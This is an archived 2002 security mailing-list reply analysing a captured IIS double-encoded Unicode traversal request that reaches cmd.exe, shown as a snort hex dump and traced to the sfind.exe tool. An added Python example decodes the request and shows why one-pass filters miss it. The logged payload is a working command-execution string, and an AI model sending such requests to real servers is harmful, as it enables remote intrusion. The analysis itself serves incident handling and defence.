Re: Unicode worm?

From: pjat_private
Date: Fri Aug 23 2002 - 04:43:25 PDT


    I think the single-request attack you describe corresponds to this payload:
    
    06/17/02-18:12:39.590684 192.84.105.44:2468 -> X.X.X.X:80
    TCP TTL:108 TOS:0x0 ID:3615 IpLen:20 DgmLen:99 DF
    ***AP*** Seq: 0xC14916B  Ack: 0xC6B3FB9C  Win: 0x40B0  TcpLen: 20
    47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
    32 35 35 63 25 32 35 35 63 2E 2E 2F 77 69 6E 6E  255c%255c../winn
    74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65  t/system32/cmd.e
    78 65 3F 2F 63 2B 64 69 72 0D 0A                 xe?/c+dir..
    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
    
    If Unicode translation is applied, %255c%255c is seen as %5c%%5c.
    
    This request is sent by the unicode option of the sfind.exe tool. Sfind.exe
    originates from China; I have seen it used in different toolkits for
    semi-automated establishment of Warez "FXP" servers on vulnerable IIS
    servers, see http://www.esec.dk/pubstro.pdf
    
    best regards
    Peter Jelver
    
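The decoding step Peter describes, worked through as an added example that is not part of his message, of the ARIS list, or of the sfind.exe tool: it recovers the request from a copy of the snort hex dump above, percent-decodes the path repeatedly the way a double-decoding IIS would (once before the path check, once more before mapping to the filesystem, with backslash as a separator), and reports the decode stage at which the path leaves the /scripts virtual root. The embedded dump text, the /scripts root, the three-round limit and all function names are assumptions made for the illustration.

```python
import posixpath
import urllib.parse

# Constructed copy of the four payload lines from the snort dump above.
SNORT_DUMP = """\
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
32 35 35 63 25 32 35 35 63 2E 2E 2F 77 69 6E 6E  255c%255c../winn
74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65  t/system32/cmd.e
78 65 3F 2F 63 2B 64 69 72 0D 0A                 xe?/c+dir..
"""


def payload_from_dump(dump):
    """Rebuild the TCP payload from snort's hex-dump lines.

    Each line carries up to 16 bytes as hex pairs in its first 47 columns,
    followed by the ASCII rendering; only the hex columns are trusted.
    """
    out = bytearray()
    for line in dump.splitlines():
        if not line.strip():
            continue
        out += bytes.fromhex("".join(line[:47].split()))
    return bytes(out)


def request_path(payload):
    """Return the request-target path (query string removed) of an HTTP request."""
    request_line = payload.split(b"\r\n", 1)[0].decode("ascii")
    _method, target, *_ = request_line.split(" ")
    return target.split("?", 1)[0]


def decode_rounds(path, max_rounds=3):
    """Percent-decode repeatedly and return every stage, stopping at a fixed point.

    Models the flaw described above: a server that decodes once before its
    security check and once more before touching the filesystem sees stage 1
    during the check but acts on stage 2. max_rounds is an assumed bound.
    """
    stages = [path]
    for _ in range(max_rounds):
        nxt = urllib.parse.unquote(stages[-1])
        if nxt == stages[-1]:
            break
        stages.append(nxt)
    return stages


def canonical(path):
    """Canonicalise with Windows semantics: backslash is a separator, '..' collapses."""
    return posixpath.normpath(path.replace("\\", "/"))


def escapes_root(path, vroot="/scripts"):
    """Return the first decode stage whose canonical form leaves vroot, or None.

    A check that only decodes once (stage 1) passes the double-encoded
    payload; the escape only becomes visible at stage 2.
    """
    for stage_no, stage in enumerate(decode_rounds(path)):
        c = canonical(stage)
        if not (c == vroot or c.startswith(vroot + "/")):
            return stage_no
    return None


if __name__ == "__main__":
    p = request_path(payload_from_dump(SNORT_DUMP))
    for n, s in enumerate(decode_rounds(p)):
        print(f"stage {n}: {s} -> {canonical(s)}")
    print("escapes /scripts at stage:", escapes_root(p))
```

Running it shows stage 1 as `/scripts/..%5c%5c../winnt/system32/cmd.exe`, which still canonicalises under `/scripts/`, while stage 2 becomes `/winnt/system32/cmd.exe`; a filter that stops after one decode therefore never sees the traversal, which is why the double-encoded form works where plain `..%5c` is caught.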
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Fri Aug 23 2002 - 10:08:13 PDT